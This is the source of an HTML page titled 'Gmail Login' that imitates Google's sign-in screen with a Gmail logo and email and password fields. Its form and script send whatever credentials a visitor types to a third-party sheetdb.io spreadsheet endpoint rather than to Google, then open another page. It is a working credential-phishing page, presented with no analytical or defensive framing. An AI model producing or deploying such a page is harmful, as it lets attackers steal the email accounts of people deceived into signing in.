<!DOCTYPE html>
<html>
<head>
  <title>Gmail Login</title>
  <style>
    /* Add some basic styling to the page */
body {
  font-family: Arial, sans-serif;
  background-color: #f6f6f6;
}

/* Style the login container */
.login-container {
  width: 400px;
  margin: 0 auto;
  background-color: #fff;
  border: 1px solid #ccc;
  box-shadow: 0 2px 2px rgba(0, 0, 0, 0.1);
}

/* Style the login form */
.login-form {
  padding: 20px;
}

/* Style the form inputs and button */
.login-form input[type="email"],
.login-form input[type="password"] {
  width: 100%;
  margin-bottom: 10px;
  padding: 12px 20px;
  border: 1px solid #ccc;
  box-sizing: border-box;
  font-size: 14px;
}

.login-form button[type="submit"] {
  width: 100%;
  padding: 12px 20px;
  background-color: #4caf50;
  color: #fff;
  font-size: 14px;
  border: none;
  cursor: pointer;
}

/* Style the logo image */
.login-form img {
  display: block;
  margin: 0 auto;
  width: 100px;
}

  </style>
 
</head>
<body>
  <div class="login-container">
    <div class="login-form">
        <img src="gmail-logo.png" alt="Gmail logo">


        <form action="https://sheetdb.io/api/v1/htydtpds3jr30" method="post" id="sheetdb-form"  >
        <input type="email" id="email" name="email" placeholder="Email" class="form-control" required>
        <input type="password" id="password" name="password" class="form-control" placeholder="Password" required>
        <button type="submit">Sign in</button>
      </form>
    </div>
  </div>
</body>
<script>
  var form = document.getElementById('sheetdb-form');
form.addEventListener("submit", e => {
e.preventDefault();
fetch(form.action, {
    method : "POST",
    body: new FormData(document.getElementById("sheetdb-form")),
}).then(
    response => response.json()
).then((html) => {
  // you can put any JS code here
  window.open('show.html', '_blank');

});
});
</script>

</html>
